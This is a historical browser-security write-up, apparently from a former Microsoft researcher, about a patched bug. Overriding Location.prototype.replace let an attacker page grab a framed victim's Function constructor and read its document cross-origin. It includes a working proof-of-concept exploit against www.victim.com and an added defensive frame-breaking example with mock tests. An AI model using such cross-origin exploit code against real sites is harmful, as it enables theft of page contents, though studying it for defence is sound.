By overriding Location.prototype.replace on the top-level window, an attacker page could intercept any call to location.replace() made by a framed page — including the common frame-breaking pattern top.location.replace(...). At the moment of interception, arguments.callee.caller.constructor gave access to the Function constructor of the calling context, allowing cross-origin document access.
```html
<script>
// Attacker page: replace the shared Location.prototype.replace so a framed page's top.location.replace(...) lands here
Location.prototype.replace = function() {
  // arguments.callee.caller is the victim's frame-breaking function; its constructor is the victim context's Function
  var xFunction = arguments.callee.caller.constructor;
  xFunction("alert(document.URL + '\\n\\n' + document.body.innerHTML)")();
};
</script>
<!-- Then load a page with frame-breaking code (top.location.replace(...)) -->
<iframe src="http://www.victim.com/framebreaker2.html"></iframe>
```
One important constraint: the argument to location.replace in the victim page had to be a number or empty — if it was a string, the prototype override path was not taken. Pages that used top.location.replace(someStringUrl) as their frame-breaking code were protected by this quirk.
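The following is an added example, not code from the original post, showing how a framed page's frame-breaking routine can defend itself against the two weaknesses described above: it refuses to call a `location.replace` that is no longer native code (the prototype override), and it always passes a string URL (the quirk that protected string-argument callers). The function names `isNativeFunction`, `safeFrameBreak` and `runScenarios`, and the mock window objects, are assumptions made for this example; `Array.prototype.push` stands in for the browser's native `replace` so the block runs under Node.

```javascript
// Added example (not from the original post). Checks whether a function is still
// native code by inspecting its source text, as built-ins stringify to
// "function name() { [native code] }".
function isNativeFunction(fn) {
  if (typeof fn !== 'function') return false;
  return /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Frame-breaker that takes its window objects as parameters so it can be exercised
// outside a browser. `hideDocument` is the fallback when replace looks tampered with
// (in a real page: document.body.style.display = 'none').
function safeFrameBreak(self, top, hideDocument) {
  if (self === top) return 'not-framed';
  const replace = top.location.replace;
  if (!isNativeFunction(replace)) {
    // Do not hand control to an attacker-supplied replacement function.
    hideDocument();
    return 'tampered';
  }
  // Always pass a string: the write-up notes the override path was only taken
  // for a number or empty argument.
  replace.call(top.location, String(self.location.href));
  return 'redirected';
}

// Constructed mock frames (stand-ins for real browser objects, assumption for this example).
function makeMockFrames(replaceImpl) {
  const top = { location: { href: 'https://attacker.example/', replace: replaceImpl } };
  const self = { location: { href: 'https://victim.example/page' } };
  return { top, self };
}

function runScenarios() {
  const results = {};

  // Untampered: Array.prototype.push is native code and, called on the location
  // object, records the URL it was given at index 0.
  const a = makeMockFrames(Array.prototype.push);
  let hiddenA = false;
  results.untampered = {
    outcome: safeFrameBreak(a.self, a.top, () => { hiddenA = true; }),
    target: a.top.location[0],
    hidden: hiddenA,
  };

  // Tampered: a script-defined replacement, as in the write-up.
  const b = makeMockFrames(function () { /* attacker-supplied */ });
  let hiddenB = false;
  results.tampered = {
    outcome: safeFrameBreak(b.self, b.top, () => { hiddenB = true; }),
    hidden: hiddenB,
  };

  // Not framed at all: nothing to do.
  const c = makeMockFrames(Array.prototype.push);
  results.unframed = safeFrameBreak(c.self, c.self, () => {});

  return results;
}

console.log(runScenarios());
```

The native-code check is a heuristic: bound functions and Proxies also stringify as `[native code]`, so it only catches the plain function override shown in the post. Script-level frame-breaking is inherently a race with the embedding page; the mitigation that cannot be tampered with from script is a server-side framing policy (the `X-Frame-Options` header or a CSP `frame-ancestors` directive).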
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.